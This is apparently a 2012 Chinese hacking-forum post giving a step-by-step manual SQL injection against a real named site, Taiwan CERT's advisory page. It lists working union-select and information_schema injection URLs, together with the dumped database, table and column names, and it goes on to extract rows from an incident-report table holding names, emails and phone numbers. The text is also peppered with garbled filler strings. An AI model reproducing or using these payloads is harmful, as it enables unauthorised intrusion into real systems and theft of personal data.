1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询) }# i* w6 Q+ S. t- P
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解! B6 I/ X; h% p7 ^$ g7 f5 M
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
. X' ^9 N" T0 M1 E/ _+ M3 U% a3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
! Q& T7 ? P! [' o4 Z数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
$ |7 [4 ]$ k h4.判断有没有写权限" B* O7 v( ^, v5 Y- C% f2 F
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限# ^% q3 r0 n: V$ S( a4 X( Y. w
没办法,手动猜表啦/ Y* W" c* `6 a; {/ e
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
, ~& o6 G2 V& Y* h: `+ R但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下8 C5 n# u7 U: V$ [* e
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--! _) b$ h4 [, K' x) q" m/ c2 r; R
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
: w. O* k6 N, xinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
& U& G0 ~2 h& {4 f6 Z6.爆表,爆的是twcert库) f# ?& a1 d/ i
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--% B! M9 I. }3 C8 ?! R
爆出如下表. O9 d# ?. p+ F- A$ _3 o- }
downloadfile,irsys,newsdata,secrpt,secrpt_big5) Q: Q# k; C* z( l/ w: U" _& _$ p
7.爆列名,这次爆的是irsys表
7 O( p& c5 _, w9 b. @2 S: S: xhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--: a$ ?4 |. g8 w% |' C. L
爆出如下列) U! D& d/ B! j, P5 k5 ?
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status5 p* x) B# g2 K0 e8 [5 a! d7 d
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。0 ~- }2 W4 P8 n1 h& z
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--9 H4 e7 I5 B; o% l6 P6 T$ K! h8 W
返回是3,说明每个列里有3个地段
& P( m) ?. O- F' w9.爆字段内容" \, E. t. g4 C, b6 |
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--' M K5 e/ N( [0 E" K9 Z. |
爆出name列的第一个字段的内容8 k! r# ~; R3 w- b
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
0 k9 k8 a& ?) G6 ?3 V爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对